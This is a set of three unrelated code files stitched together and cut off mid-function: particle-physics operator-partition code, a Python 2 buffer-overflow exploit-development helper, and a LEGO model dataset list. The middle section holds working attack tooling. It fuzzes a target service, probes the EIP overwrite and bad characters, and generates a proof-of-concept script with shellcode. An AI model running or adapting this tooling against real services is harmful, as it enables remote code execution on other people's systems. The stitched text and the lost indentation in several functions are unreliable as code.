    Returns the rebuilt structure together with a flag saying whether the
    substitution has already happened (so recursive calls stop early).

    Example:
    >>> replace((("F", 18), ("S", 45), ...), "F", L('u1 i1'))
    ((L(u1, i1), 18), ("S", 45), ...), True
    """
    # Once a replacement has been made, everything passes through untouched.
    if found:
        return data, found

    if isinstance(data, tuple):
        rebuilt = []
        for item in data:
            new_item, found = replace(item, to_replace, replace_with, found)
            rebuilt.append(new_item)
        # Rebuild with the same container type: Leaf stays a Leaf.
        if isinstance(data, Leaf):
            return Leaf(*rebuilt), found
        return tuple(rebuilt), found

    if data == to_replace:
        return replace_with, True

    return data, found
def replace_fields(fields: List[IndexedField], partition):
    """Slot each field into the partition template, consuming one matching
    placeholder ("S" for bosons, "F" for fermions) per field.

    >>> replace_fields([H('i0_'), H('i1_'), L('u0_ i2_'), L('u1_ i3_')], (('F', 18), ('S', 162), (('F', 6), ('S', 54))))
    ((L(u0_, i2_), 18), (H(i0_), 162), ((L(u1_, i3_), 6), (H(i1_), 54)))
    """
    result = partition
    for field in fields:
        placeholder = "S" if field.is_boson else "F"
        # Each call replaces only the first remaining placeholder of this kind.
        result, _ = replace(data=result, to_replace=placeholder, replace_with=field)
    return result
def quick_remove_equivalent_partitions(partitions):
    """Deduplicate the partition list by hashing. (For now.)

    Also a convenient hook for discarding partitions that are known in
    advance to be filtered out later.
    """
    unique = set(partitions)
    return list(unique)
def distribute_fields(fields, partition):
    """Fill the partition template with the fields in every possible order.

    >>> distribute_fields([H('i0_'), H('i1_'), L('u0_ i2_'), L('u1_ i3_')], (('F', 18), ('S', 162), (('F', 6), ('S', 54))))
    [((L(u0_, i2_), 18), (H(i0_), 162), ...), ((L(u1_, i3_), 18), (H(i0_), 162), ...), ...]

    Returns lots of double ups.
    """
    filled = [
        replace_fields(ordering, partition)
        for ordering in permutations(fields)
    ]
    return quick_remove_equivalent_partitions(filled)
def node_dictionary(
    partition: tuple, field_dict: Dict[IndexedField, int]
) -> Dict[int, str]:
    """Map each graph-node number in ``partition`` to a ``{"particle": ...}``
    attribute dict labelling the field attached there.

    Example:
    >>> node_dictionary((((Q(u364_, c210_, i369_), 6), (L(u362_, i367_), 18)),
                        ((L(u361_, i366_), 54), (Q(u363_, c209_, i368_), 162)),
                        ((db(u368_, -c214_), 486), (db(u366_, -c212_), 1458))))
    {6: 'Q', 18: 'L', ...}
    """
    # Flattening the nested partition yields field, node, field, node, ...
    pairs = chunks(list(flatten(partition)), 2)
    out = {}
    for field, node in pairs:
        # Suffix the disambiguating counter so repeated labels stay distinct.
        out[node] = {"particle": field.label + str(field_dict[field])}
    return out
def set_external_fields(
    partition: tuple, graph: nx.Graph, field_dict: Dict[IndexedField, int]
) -> nx.Graph:
    """Return a copy of ``graph`` with the external fields of ``partition``
    attached as edge attributes.

    The input graph is NOT mutated: a deep copy is annotated and returned.
    (The previous docstring claimed mutation "through side effect", which
    the code never did.)

    Args:
        partition: nested (field, node-number) template.
        graph: topology graph whose nodes appear in ``partition``.
        field_dict: counter map from ``indexed_fields_with_counters`` used
            by ``node_dictionary`` to disambiguate repeated fields.
    """
    annotated = deepcopy(graph)
    node_attrs = node_dictionary(partition, field_dict)
    edge_attrs = {}
    for edge in graph.edges:
        # An external field labels every edge incident on its node.
        # (Renamed the loop variable: it previously shadowed the
        # ``field_dict`` parameter.)
        for node, attrs in node_attrs.items():
            if node in edge:
                edge_attrs[edge] = attrs
    nx.set_edge_attributes(annotated, edge_attrs)
    return annotated
def indexed_fields_with_counters(op: Operator) -> Dict[IndexedField, int]:
    """Return a dictionary mapping indexed fields to an integer labelling distinct
    fields to help with isomorphism filtering.

    Copies of a field that are interchangeable — either because they carry no
    isospin index, or because their isospin indices are contracted with each
    other by an epsilon — are assigned the same counter.

    TODO Need to rewrite this to include colour indices! Need to then move
    position of call to include operator with colour structure!
    """
    # idxs are the pairs of contracted isospin indices
    counts = defaultdict(list)
    idxs = []
    for f in op.tensors:
        if isinstance(f, IndexedField):
            counts[f.label].append(f)
        else:
            # non-field tensors are the epsilons; keep their index pairs
            idxs.append(f.indices)
    # Start by giving each copy of a field its own counter 0, 1, 2, ...
    labelled_counts = {k: [[f, i] for i, f in enumerate(v)] for k, v in counts.items()}
    for k, v in labelled_counts.items():
        for (f1, i1), (f2, i2) in combinations(v, 2):
            if not f1.indices_by_type["Isospin"]:
                # fields are interchangeable, replace
                f2_idx = labelled_counts[k].index([f2, i2])
                labelled_counts[k][f2_idx] = [f2, i1]
                continue
            iso1 = f1.indices_by_type["Isospin"][0]
            iso2 = f2.indices_by_type["Isospin"][0]
            if [-iso1, -iso2] in idxs or [-iso2, -iso1] in idxs:
                # combination of indices match an epsilon-index pair. In this
                # case, need to replace i2 with i1
                f2_idx = labelled_counts[k].index([f2, i2])
                labelled_counts[k][f2_idx] = [f2, i1]
            else:
                continue
    # Flatten {label: [[field, counter], ...]} into one field -> counter map.
    flat = reduce(lambda x, y: x + y, labelled_counts.values())
    return dict(flat)
def partitions(operator: EffectiveOperator, verbose=False) -> List[dict]:
    """Returns a list of operator partitions, epsilons and graphs of the form:

    {"fields": ((L(u0, I_0), 18), ...)
     "epsilons": (...),
     "graph": ...}

    from the partitions of the fields in the operator. This is all of the
    information required to find the completion.
    """
    # Topologies compatible with this operator's field content.
    topology_data_list = get_topology_data(**operator.topology_type)
    # Every way of contracting the colour indices (overcomplete on purpose).
    colour_ops = colour_singlets([operator.operator], overcomplete=True)
    colour_ops = [EffectiveOperator(operator.name, op) for op in colour_ops]
    if verbose:
        print(
            f"Finding partitions of {operator.name}. "
            + f"There are {len(colour_ops)} colour structures and "
            + f"{len(topology_data_list)} relevant topologies."
        )
    out = []
    counter = 1
    for topology_data in topology_data_list:
        if verbose:
            print(f"Furnishing topology {counter}...")
        counter += 1
        # return counters as well for isomorphism filtering
        fields_and_counters = indexed_fields_with_counters(operator.operator)
        fields = [f for f, i in fields_and_counters.items()]
        # All distinct assignments of fields to this topology's template.
        perms = distribute_fields(fields, topology_data["partition"])
        for op in colour_ops:
            # col_out = []
            epsilons = op.operator.epsilons
            for perm in perms:
                # Annotate a copy of the topology graph with the external fields.
                g = topology_data["graph"]
                g = set_external_fields(perm, g, fields_and_counters)
                # Topology classification is the partition file's basename.
                partition_file = topology_data["partition_file"]
                topology_classification = os.path.splitext(
                    os.path.basename(partition_file)
                )[0]
                data = {
                    "operator": op,
                    "partition": perm,
                    "epsilons": epsilons,
                    "graph": g,
                    "topology": topology_classification,
                }
                out.append(data)
            # if remove_isomorphic_diagrams:
            #     col_out = remove_isomorphic(col_out)
            # out += col_out
    return out
def are_equivalent_partitions(a, b):
    """Two partitions are equivalent iff their annotated graphs are isomorphic."""
    graph_a = a["graph"]
    graph_b = b["graph"]
    # Cheap screen first; bail out before the expensive isomorphism check.
    if not iso.faster_could_be_isomorphic(graph_a, graph_b):
        return False
    # Edges must also agree on their "particle" labels ("exotic" default).
    edge_match = iso.categorical_edge_match("particle", "exotic")
    return nx.is_isomorphic(graph_a, graph_b, edge_match=edge_match)
def graph_fingerprint(part):
    """Cheap graph invariant for a partition: its sorted degree sequence."""
    degrees = dict(part["graph"].degree())
    return sorted(degrees.values())
def remove_isomorphic(partitions: List[dict]) -> List[dict]:
    """Same algorithm as removeIsomorphic in ``wolfram/`` directory. Remove
    isomorphic graphs (by side effect) to reduce double-ups of completions.

    NOTE(review): despite the "by side effect" wording, the result of
    ``remove_equivalent_nopop`` is returned — confirm whether ``partitions``
    is also mutated in place before relying on either behaviour.
    """
    return remove_equivalent_nopop(partitions, are_equivalent_partitions)
# The approach to finding the completions is the following: contract off fields
# and find corresponding exotic and term. Replace the fields by the exotic and
# keep track of the available epsilons and the terms by mutation. The pipeline is
#
# contract: returns exotic field, new gauge epsilons (fewer) and new lorentz
# epsilons (more)
#
# replace_and_mutate: returns a Leaf structure that enters the partition in
# place of the contracted fields, mutates terms, edge_dict of graph,
# gauge_epsilons and lorentz_epsilons
#
# reduce_partition: applies replace_and_mutate to a partition until last vertex.
def all_scalars(fields: List[Field]) -> bool:
"""Checks if all fields are scalars."""
boolean = True
for f in fields:
boolean = boolean and f.is_boson
return boolean
def all_fermions(fields: List[Field]) -> bool:
"""Checks if all fields are fermions."""
boolean = True
for f in fields:
boolean = boolean and f.is_fermion
return boolean
def drop_scalar(fields: List[Field]) -> List[Field]:
"""Given a list of fields with one scalar, return a list of only the
fermions, i.e. remove the scalar.
"""
scalars, fermions = [], []
for f in fields:
if f.is_boson:
scalars.append(f)
elif f.is_fermion:
fermions.append(f)
assert len(scalars) == 1
return fermions
def get_lorentz_epsilons(fields: Tuple[IndexedField]) -> Tuple[bool, List[Tensor]]:
    """Takes a list of two or three fields (possibly with derivatives) and returns
    the lorentz epsilons that contract the fields to as low a Lorentz irrep as
    possible as well as a boolean indicating whether the contraction is allowed.

    Raises:
        Exception: if the fields carry more than two derivatives in total.
    """
    deriv_structure = [f.derivs for f in fields]
    n_derivs = sum(deriv_structure)
    if n_derivs > 2:
        raise Exception(
            f"Not currently supporting {n_derivs} derivatives in an operator."
        )
    # Four fields, no derivatives: allowed with no epsilons needed.
    if not n_derivs and len(fields) == 4:
        return True, []
    if not n_derivs and len(fields) == 3:
        if all_scalars(fields):
            # Three scalars contract trivially.
            return True, []
        elif all_fermions(fields):
            # Three fermions cannot form a Lorentz singlet.
            return False, []
        # Mixed case: two fermions and a scalar; the scalar is irrelevant
        # for the Lorentz structure, so drop it and recurse.
        return get_lorentz_epsilons(drop_scalar(fields))
    if n_derivs == 2 and len(fields) == 3:
        # Put the fields carrying derivatives first.
        fields = sorted(fields, key=lambda f: -f.derivs)
    prod = reduce(lambda x, y: x * y, fields)
    # Only the undotted/dotted spinor indices matter here (note trailing
    # comma: indices_by_type yields five groups).
    undotted, dotted, _, _, _, = prod.indices_by_type.values()
    # Reject vector contraction
    if len(undotted) == 1 and len(dotted) == 1:
        return False, []
    epsilons = []
    for indices in [undotted, dotted]:
        # skip single indices (fermion, scalar) contraction
        if len(indices) == 1:
            continue
        # pair up all even indices; if odd, leave last index
        if len(indices) % 2 != 0:
            indices.pop(-1)
        for i, j in chunks(indices, 2):
            epsilons.append(eps(f"-{i} -{j}"))
    return True, epsilons
def is_contracted_epsilon(eps: Tensor, indices: List[Index]) -> bool:
"""Return True if two indices on epsilon are contracted, False otherwise."""
i, j, *k = | |
# <gh_stars>1-10  (dataset artifact, not valid Python — kept as a comment)
# -*- coding: utf-8 -*-
import traceback
import time
import json
import re
# - - - - - - - - - - - - - - - - - - - - - - - -
from lib_socket import *
from lib_primitive import *
# - - - - - - - - - - - - - - - - - - - - - - - -
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def simple_fuzzer (socket, config, steps, max_length=10000):
    """Grow an "A"-filled payload by ``steps`` bytes per attempt until the
    service stops responding or ``max_length`` is reached.

    Returns the approximate crash length, -1 if no crash occurred, or -2 if
    the loop never ran (e.g. the port was closed from the start).
    """
    # socket: socket wrapper object
    # config: attack configuration dict
    # steps: increment (in bytes) between attempts
    # max_length: maximum payload size (default 10000)
    char = "\x41" # "A" test character
    c = steps # number of characters to send
    send_status = 0 # 0 while sends succeed (original comment claimed -1 on closed port; the code never sets that here)
    cycled = False # whether the loop body ran at least once
    server_status = socket.check_port ()
    while (server_status == 0) and (send_status == 0) and (c <= max_length):
        print "[i] Sending " + str(c) + " chars at " + str(config['addr']) + ":" + str(config['port'])
        cycled = True
        payload = (char * c)
        send_status = socket.run_protocol_exploit(config, payload)
        server_status = socket.check_port ()
        c += steps
        time.sleep(1) # pause between one request and the next
    server_status = socket.check_port ()
    # NOTE(review): `and` binds tighter than `or`, so a failed send returns
    # the crash length even when the loop never cycled — confirm intended.
    if (cycled) and (server_status != 0) or (send_status != 0):
        return c - steps # it crashed: undo the last increment
    if (cycled) and (server_status == 0) and (send_status == 0):
        return -1 # it did not crash
    else:
        return -2
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def eip_check (socket, config, offset):
    """Probe the EIP overwrite: ``offset`` filler "A" bytes followed by four
    "B" bytes that should land in the saved return address.

    socket: socket wrapper object
    config: attack configuration dict
    offset: size of the filler before the return address
    Returns the exploit status, or -1 when the target port is closed.
    """
    if socket.check_port() != 0:
        return -1
    payload = "\x41" * offset + "\x42" * 4
    return socket.run_protocol_exploit(config, payload)
def space_check (socket, config, offset):
    """Check the space available after the return address: filler + fake EIP
    followed by 2000 "C" bytes.

    socket: socket wrapper object
    config: attack configuration dict
    offset: size of the filler before the return address
    Returns the exploit status, or -1 when the target port is closed.
    """
    if socket.check_port() != 0:
        return -1
    filler = "\x41" * offset      # "A" overflow filler
    fake_eip = "\x42" * 4         # "B" EIP marker
    probe = "\x43" * 2000         # "C" space probe
    return socket.run_protocol_exploit(config, filler + fake_eip + probe)
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def send_badchar (socket, config, offset, ex_chars, space, preeip):
    """Send the full 0x00-0xFF byte range (minus ``ex_chars``) so bad
    characters can be identified in a debugger.

    socket: socket wrapper object
    config: attack configuration dict
    offset: size of the filler before the return address
    ex_chars: excluded characters (array of two-digit hex strings to drop)
    space: space available after the EIP address (currently unused)
    preeip: if true, place the badchar string before the EIP overwrite
    Returns the exploit status, -1 on closed port, -3 on internal error.
    """
    try:
        # Every possible byte value, as one-character strings.
        badchar_arr = [
            "\x00", "\x01", "\x02", "\x03", "\x04", "\x05", "\x06", "\x07", "\x08", "\x09", "\x0a",
            "\x0b", "\x0c", "\x0d", "\x0e", "\x0f", "\x10", "\x11", "\x12", "\x13", "\x14", "\x15",
            "\x16", "\x17", "\x18", "\x19", "\x1a", "\x1b", "\x1c", "\x1d", "\x1e", "\x1f", "\x20",
            "\x21", "\x22", "\x23", "\x24", "\x25", "\x26", "\x27", "\x28", "\x29", "\x2a", "\x2b",
            "\x2c", "\x2d", "\x2e", "\x2f", "\x30", "\x31", "\x32", "\x33", "\x34", "\x35", "\x36",
            "\x37", "\x38", "\x39", "\x3a", "\x3b", "\x3c", "\x3d", "\x3e", "\x3f", "\x40", "\x41",
            "\x42", "\x43", "\x44", "\x45", "\x46", "\x47", "\x48", "\x49", "\x4a", "\x4b", "\x4c",
            "\x4d", "\x4e", "\x4f", "\x50", "\x51", "\x52", "\x53", "\x54", "\x55", "\x56", "\x57",
            "\x58", "\x59", "\x5a", "\x5b", "\x5c", "\x5d", "\x5e", "\x5f", "\x60", "\x61", "\x62",
            "\x63", "\x64", "\x65", "\x66", "\x67", "\x68", "\x69", "\x6a", "\x6b", "\x6c", "\x6d",
            "\x6e", "\x6f", "\x70", "\x71", "\x72", "\x73", "\x74", "\x75", "\x76", "\x77", "\x78",
            "\x79", "\x7a", "\x7b", "\x7c", "\x7d", "\x7e", "\x7f", "\x80", "\x81", "\x82", "\x83",
            "\x84", "\x85", "\x86", "\x87", "\x88", "\x89", "\x8a", "\x8b", "\x8c", "\x8d", "\x8e",
            "\x8f", "\x90", "\x91", "\x92", "\x93", "\x94", "\x95", "\x96", "\x97", "\x98", "\x99",
            "\x9a", "\x9b", "\x9c", "\x9d", "\x9e", "\x9f", "\xa0", "\xa1", "\xa2", "\xa3", "\xa4",
            "\xa5", "\xa6", "\xa7", "\xa8", "\xa9", "\xaa", "\xab", "\xac", "\xad", "\xae", "\xaf",
            "\xb0", "\xb1", "\xb2", "\xb3", "\xb4", "\xb5", "\xb6", "\xb7", "\xb8", "\xb9", "\xba",
            "\xbb", "\xbc", "\xbd", "\xbe", "\xbf", "\xc0", "\xc1", "\xc2", "\xc3", "\xc4", "\xc5",
            "\xc6", "\xc7", "\xc8", "\xc9", "\xca", "\xcb", "\xcc", "\xcd", "\xce", "\xcf", "\xd0",
            "\xd1", "\xd2", "\xd3", "\xd4", "\xd5", "\xd6", "\xd7", "\xd8", "\xd9", "\xda", "\xdb",
            "\xdc", "\xdd", "\xde", "\xdf", "\xe0", "\xe1", "\xe2", "\xe3", "\xe4", "\xe5", "\xe6",
            "\xe7", "\xe8", "\xe9", "\xea", "\xeb", "\xec", "\xed", "\xee", "\xef", "\xf0", "\xf1",
            "\xf2", "\xf3", "\xf4", "\xf5", "\xf6", "\xf7", "\xf8", "\xf9", "\xfa", "\xfb", "\xfc",
            "\xfd", "\xfe", "\xff"
        ]
        for c in ex_chars: # drop the already-known bad characters
            badchar_arr.remove(c.decode('hex'))
        char = "\x41" # "A" character for the overflow filler
        eip_char = "\x42" * 4 # "B" characters marking the EIP slot
        extra = "\x43" * 4 # "C" padding placed after EIP
        badchar_string = ''.join([str(x) for x in badchar_arr]) # collapse badchar_arr into a single string
        #print badchar_string.encode('hex')
        server_status = socket.check_port ()
        if (server_status == 0):
            payload = ""
            if (preeip): payload = char * (offset - len(badchar_string)) + badchar_string + eip_char + extra
            else: payload = char * (offset) + eip_char + badchar_string + extra
            return socket.run_protocol_exploit(config, payload)
        else:
            return -1
    except Exception, e:
        traceback.print_exc(e)
        return -3
def build_poc (config, SESSION, filename, nnops=16):
# config: dict di configurazione attacco
# SESSION: dict di sessione
# filename: nome del file dell'exploit
# nnops: il numero di nops da inserire
try:
str_buffer_apprx_length = ""
str_buffer_length = ""
str_eip_value = ""
str_badchar = ""
str_shellcode = ""
sliced_shellcode = ""
str_addr = '"' + str(config ['addr']) + '"'
str_port = str(config ['port'])
str_lbytes = '"' + str_pythonic_escape(config ['lbytes']) + '"'
str_rbytes = '"' + str_pythonic_escape(config ['rbytes']) + '"'
str_buffer_length = ""
str_space = ""
str_return_address = ""
out = '#!/usr/bin/env python\n#-*- coding: utf-8 -*-\n\nimport socket\n\n'
if SESSION ['raw_fuzzing']['buffer_apprx_length'] != None:
str_buffer_apprx_length = str(SESSION ['raw_fuzzing']['buffer_apprx_length'])
out += '# RAW FUZZING OFFSET:\tbuffer_apprx_length = ' + str_buffer_apprx_length + '\n'
if SESSION ['precise_fuzzing']['buffer_length'] != None:
str_buffer_length = str(SESSION ['precise_fuzzing']['buffer_length'])
out += '# PRECISE FUZZING:\tbuffer_length = ' + str_buffer_length + '\n'
if SESSION ['precise_fuzzing']['eip_value'] != None:
str_eip_value = '"' + hex_escape(SESSION ['precise_fuzzing']['eip_value']) + '"'
out += '# PRECISE FUZZING:\teip_value = ' + str_eip_value + '\n'
if SESSION ['space_check']['space'] != None:
str_space = str(SESSION ['space_check']['space'])
if SESSION ['find_badchar']['badchar'] != None:
str_badchar = str('\"\\x' if len(SESSION ['find_badchar']['badchar']) > 0 else '') + str('", "\\x'.join([str(x) for x in SESSION ['find_badchar']['badchar']])) + str('\"' if len(SESSION ['find_badchar']['badchar']) > 0 else '')
out += '# BADCHAR Trovati:\tbadchar = [' + str_badchar + ']\n'
if SESSION ['find_return_address']['return_address'] != None:
str_return_address = '"' + hex_escape(SESSION ['find_return_address']['return_address']) + '"'
out += '\n\n'
if SESSION ['shellcode']['shellcode'] != None:
str_shellcode = 'shellcode = ""'
sliced_shellcode = re.findall('.{1,16}', SESSION ['shellcode']['shellcode'].decode('hex'))
for e in sliced_shellcode:
str_shellcode += '\nshellcode += "' + hex_escape(e.encode('hex')) + '"'
out += str_shellcode + '\n\n\n'
out += 'nop = "\\x90"\noffset = "\\x41"\nfill = "\\x43"\n\n'
out += 'target_addr = ' + str_addr + '\ntarget_port = ' + str_port + '\n\n'
out += 'lbytes = ' + str_lbytes + '\nrbytes = ' + str_rbytes + '\n\n'
if SESSION ['precise_fuzzing']['buffer_length'] != None:
out += 'buffer_length = ' + str_buffer_length + '\n'
if SESSION ['space_check']['space'] != None:
out += 'extra_space = ' + str_space + '\n\n'
if SESSION ['find_return_address']['return_address'] != None:
out += 'return_address = ' + str_return_address + '\n\n'
out += '\n\n'
if (
SESSION ['raw_fuzzing']['buffer_apprx_length'] != None and
SESSION ['precise_fuzzing']['buffer_length'] == None and
SESSION ['space_check']['space'] == None and
SESSION ['shellcode']['shellcode'] == None and
SESSION ['find_return_address']['return_address'] == None
):
out += 'buffer_apprx_length = ' + str_buffer_apprx_length + '\n\n\n'
out += '#payload = lbytes + "' + pattern_create(SESSION ['raw_fuzzing']['buffer_apprx_length']) + '" + rbytes' + '\n'
out += 'payload = lbytes + (offset * buffer_apprx_length) + rbytes' + '\n'
elif (
SESSION ['raw_fuzzing']['buffer_apprx_length'] != None and
SESSION ['precise_fuzzing']['buffer_length'] != None and
SESSION ['space_check']['space'] == None and
SESSION ['shellcode']['shellcode'] == None and
SESSION ['find_return_address']['return_address'] == None
):
out += 'buffer_apprx_length = ' + str_buffer_apprx_length + '\n'
out += 'eip_overwrite = "\\x42"\n\n\n'
out += 'payload = lbytes + (offset * buffer_length) + (eip_overwrite * 4) + (fill * (buffer_apprx_length - (buffer_length + 4)) ) + rbytes' + '\n'
elif (
SESSION ['raw_fuzzing']['buffer_apprx_length'] != None and
SESSION ['precise_fuzzing']['buffer_length'] != None and
SESSION ['space_check']['space'] != None and
SESSION ['shellcode']['shellcode'] == None and
SESSION ['find_return_address']['return_address'] == None
):
badchar_str = ""
for x in range(0,256):
badchar_str += ("\\x" + '{:02x}'.format(x))
out += 'eip_overwrite = "\\x42"\n'
out += 'badchar_string = "' + str(badchar_str) + '"' + '\n\n\n'
out += '#payload = lbytes + (offset * buffer_length) + (eip_overwrite * 4) + | |
#!/usr/bin/env python
import ltron.settings as settings
from ltron.dataset.build_dataset import build_dataset
# Free-text triage notes: model files flagged for manual inspection.
# The "=====" markers record how far the triage had progressed on a date.
investigate = '''
10036-1 - Pizza To Go.mpd
10128-1 - Train Level Crossing.mpd
10156-1 - LEGO Truck.mpd
10159-1 - City Airport -City Logo Box.mpd
10184 - Town Plan.mpd
10197-1 - Fire Brigade.mpd
10213-1 - Shuttle Adventure.mpd
10214-1 - Tower Bridge.mpd
10264 - Corner Garage.mpd
1029-1 - Milk Delivery Truck - Tine.mpd
106-1 - UNICEF Van.mpd
107-2 - Canada Post Mail Truck.mpd
1096-1 - Race Buggy.mpd
1097-1 - Res-Q Runner.mpd
1180-1 - Space Port Moon Buggy.mpd
1462-1 - Galactic Scout.mpd
1472-1 - Holiday Home.mpd
=============== 2021/2/22 below here ======================
1477-1 - %7BRed Race Car Number 3%7D.mpd
1478-1 - Mobile Satellite Up-Link.mpd
1479-1 - 2-Pilot Craft.mpd
1484-1 - Weetabix Town House.mpd
1489-1 - Mobile Car Crane.mpd
1490-1 - Town Bank.mpd
1496-1 - Rally Car.mpd
1557-1 - Scooter.mpd
1591 - Danone Truck.mpd
1620-1 - Astro Dart.mpd
1621-1 - Lunar MPV Vehicle.mpd
1631-1 - Black Racer.mpd
1632-1 - Motor Boat.mpd
1633-1 - Loader Tractor.mpd
1656-1 - Evacuation Team.mpd
1682-1 - Space Shuttle.mpd
1702-1 - Fire Fighter 4 x 4.mpd
1704-1 - Ice Planet Satellite Plough.mpd
1713-1 - Shipwrecked Pirate.mpd
1714-1 - Surveillance Scooter.mpd
1731-1 - Ice Planet Scooter.mpd
1772-1 - Airport Container Truck.mpd
1773-1 - Airline Main_YbM0Kh4.mpd
1775-1 - Jet.mpd
1792-1 - Pleasure Cruiser.mpd
1793-1 - Space Station Zenon.mpd
1808-1 - Light Aircraft and _3j8215M.mpd
1831-1 - Maersk Line Container Lorry.mpd
1875-1 - Meteor Monitor.mpd
1887-1 - Scout Patrol Ship.mpd
1896-1 - Trauma Team.mpd
1916-1 - Starion Patrol.mpd
1952-1 - Dairy Tanker.mpd
1969-1 - Mini Robot.mpd
1974-4 - Star Quest.mpd
=============== 2021/2/22 above here ======================
20006-1 - Clone Turbo Tank - Mini.mpd
20009-1 - AT-TE Walker - Mini.mpd
20011-1 - Garbage Truck.mpd
20014-1 - 4 x 4 Dynamo.mpd
20019-1 - Slave I.mpd
20021-1 - Bounty Hunter Gunship - Mini.mpd
2140-1 - ANWB Roadside Assistance Crew.mpd
2148-1 - LEGO Truck.mpd
2149-1 - Color Line Container Lorry.mpd
2150-1 - Train Station.mpd
2531-1 - Rescue Helicopter and Jeep.mpd
2541-1 - Adventurers Car.mpd
2542-1 - Adventurers Aeroplane.mpd
2584-1 - Biker Bob.mpd
30030-1 - Racing Car.mpd
30033-1 - Racing Truck.mpd
30034-1 - Racing Tow Truck.mpd
30035-1 - Racing Car.mpd
30036-1 - Buggy Racer.mpd
30050-1 - Republic Attack Shuttle - Mini.mpd
30051-1 - X-wing Fighter - Mini.mpd
30052-1 - AAT - Mini.mpd
30053-1 - Republic Attack Cruiser - Mini.mpd
============= Stopped here for the night =======================
'''
# Intermediate-size models not yet sorted into a category.
other_intermediate = '''
1972 - Go Kart.mpd
'''
# Large models kept out of the main dataset selection below.
large = '''
10242 - Mini Cooper.mpd
10248 - Ferrari F40.mpd
10252-1 - Volkswagen Beetle.mpd
10258-1 - London Bus.mpd
10271 - Fiat 500.mpd
21307-1 - Caterham Seven 620R.mpd
21307 - Caterham Seven 620R.mpd
'''
dataset_paths = [
'10036-1 - Pizza To Go.mpd:10036 - car.ldr',
'10128-1 - Train Level Crossing.mpd:10128 - car.ldr',
'10156-1 - LEGO Truck.mpd:10156 - truck.ldr',
# big and has custom parts
#'10159-1 - City Airport -City Logo Box.mpd:10159 - airplane.ldr',
'10159-1 - City Airport -City Logo Box.mpd:10159 - helicopter.ldr',
'10159-1 - City Airport -City Logo Box.mpd:10159 - baggage car.ldr',
'10159-1 - City Airport -City Logo Box.mpd:10159 - baggage trailer.ldr',
'10184 - Town Plan.mpd:10184 - car.ldr',
'10184 - Town Plan.mpd:10184 - truck.ldr',
# stuff is poorly named here and model is weird, come back if desperate
#10197-1 - Fire Brigade.mpd
'10213-1 - Shuttle Adventure.mpd:10213 - car.ldr',
'10214-1 - Tower Bridge.mpd:10214 - sub-model a - black london taxi.ldr',
'10214-1 - Tower Bridge.mpd:10214 - sub-model b - green automobile.ldr',
'10214-1 - Tower Bridge.mpd:10214 - sub-model c - yellow truck.ldr',
'10214-1 - Tower Bridge.mpd:10214 - sub-model d - red double-decker bus.ldr',
# poorly named and model is large, come back if desperate
#'10264 - Corner Garage.mpd'
'1029-1 - Milk Delivery Truck - Tine.mpd:1029 - car.ldr',
'106-1 - UNICEF Van.mpd:106 - car.ldr',
'107-2 - Canada Post Mail Truck.mpd:107-2 - m-1a.ldr',
'107-2 - Canada Post Mail Truck.mpd:107-2 - m-1b.ldr',
'1096-1 - Race Buggy.mpd',
'1097-1 - Res-Q Runner.mpd:1097 - jetski.ldr',
'1180-1 - Space Port Moon Buggy.mpd',
'1462-1 - Galactic Scout.mpd:1462 - spaceship.ldr',
'1472-1 - Holiday Home.mpd:1472 - car 1.ldr',
'1472-1 - Holiday Home.mpd:1472 - car 2.ldr',
'1472-1 - Holiday Home.mpd:1472 - boat.ldr',
'1472-1 - Holiday Home.mpd:1472 - trailer.ldr',
#=============== 2021/2/22 below here ======================
'1477-1 - %7BRed Race Car Number 3%7D.mpd',
'1478-1 - Mobile Satellite Up-Link.mpd',
'1479-1 - 2-Pilot Craft.mpd:1479 - spaceship.ldr',
'1484-1 - Weetabix Town House.mpd:1484 - smallcar.ldr',
'1489-1 - Mobile Car Crane.mpd:1489 - passenger car.ldr',
'1489-1 - Mobile Car Crane.mpd:1489 - car crane.ldr',
'1490-1 - Town Bank.mpd:1490 - car.ldr',
'1496-1 - Rally Car.mpd:1496 - car.ldr',
'1557-1 - Scooter.mpd:1557 - space scooter - scooter.ldr',
'1591 - Danone Truck.mpd',
'1620-1 - Astro Dart.mpd:1620 - spaceship.ldr',
'1621-1 - Lunar MPV Vehicle.mpd:1621 - vehicle.ldr',
'1631-1 - Black Racer.mpd',
'1632-1 - Motor Boat.mpd',
'1633-1 - Loader Tractor.mpd',
'1656-1 - Evacuation Team.mpd:1656 - tractor.ldr',
'1656-1 - Evacuation Team.mpd:1656 - cart.ldr',
'1656-1 - Evacuation Team.mpd:1656 - car.ldr',
'1656-1 - Evacuation Team.mpd:1656 - truck.ldr',
'1656-1 - Evacuation Team.mpd:1656 - trailer.ldr',
'1682-1 - Space Shuttle.mpd:1682 - car.ldr',
'1682-1 - Space Shuttle.mpd:1682 - trailer.ldr',
'1702-1 - Fire Fighter 4 x 4.mpd:1702 - car.ldr',
'1704-1 - Ice Planet Satellite Plough.mpd:1704 - vehicle + container.ldr',
'1713-1 - Shipwrecked Pirate.mpd:1713 - raft.ldr',
'1714-1 - Surveillance Scooter.mpd:1714 - spaceship.ldr',
'1731-1 - Ice Planet Scooter.mpd:1731 - spaceship.ldr',
'1772-1 - Airport Container Truck.mpd:1772 - car.ldr',
'1772-1 - Airport Container Truck.mpd:1772 - container.ldr',
'1773-1 - Airline Main_YbM0Kh4.mpd:1773 - car.ldr',
'1773-1 - Airline Main_YbM0Kh4.mpd:1773 - trailer.ldr',
'1775-1 - Jet.mpd:1775 - airplane.ldr',
'1792-1 - Pleasure Cruiser.mpd:1792 - boat.ldr',
'1793-1 - Space Station Zenon.mpd:1793 - vehicle.ldr',
'1793-1 - Space Station Zenon.mpd:1793 - cockpit.ldr',
'1808-1 - Light Aircraft and _3j8215M.mpd:1808 - airplane.ldr',
'1831-1 - Maersk Line Container Lorry.mpd:1831 - truck.ldr',
'1831-1 - Maersk Line Container Lorry.mpd:1831 - trailer.ldr',
'1831-1 - Maersk Line Container Lorry.mpd:1831 - container.ldr',
'1875-1 - Meteor Monitor.mpd:1875 - spaceship.ldr',
'1887-1 - Scout Patrol Ship.mpd:1887 - spaceship.ldr',
'1896-1 - Trauma Team.mpd:1896 - car 1.ldr',
'1896-1 - Trauma Team.mpd:1896 - helicopter.ldr',
'1896-1 - Trauma Team.mpd:1896 - car 2.ldr',
'1916-1 - Starion Patrol.mpd:1916 - spaceship.ldr',
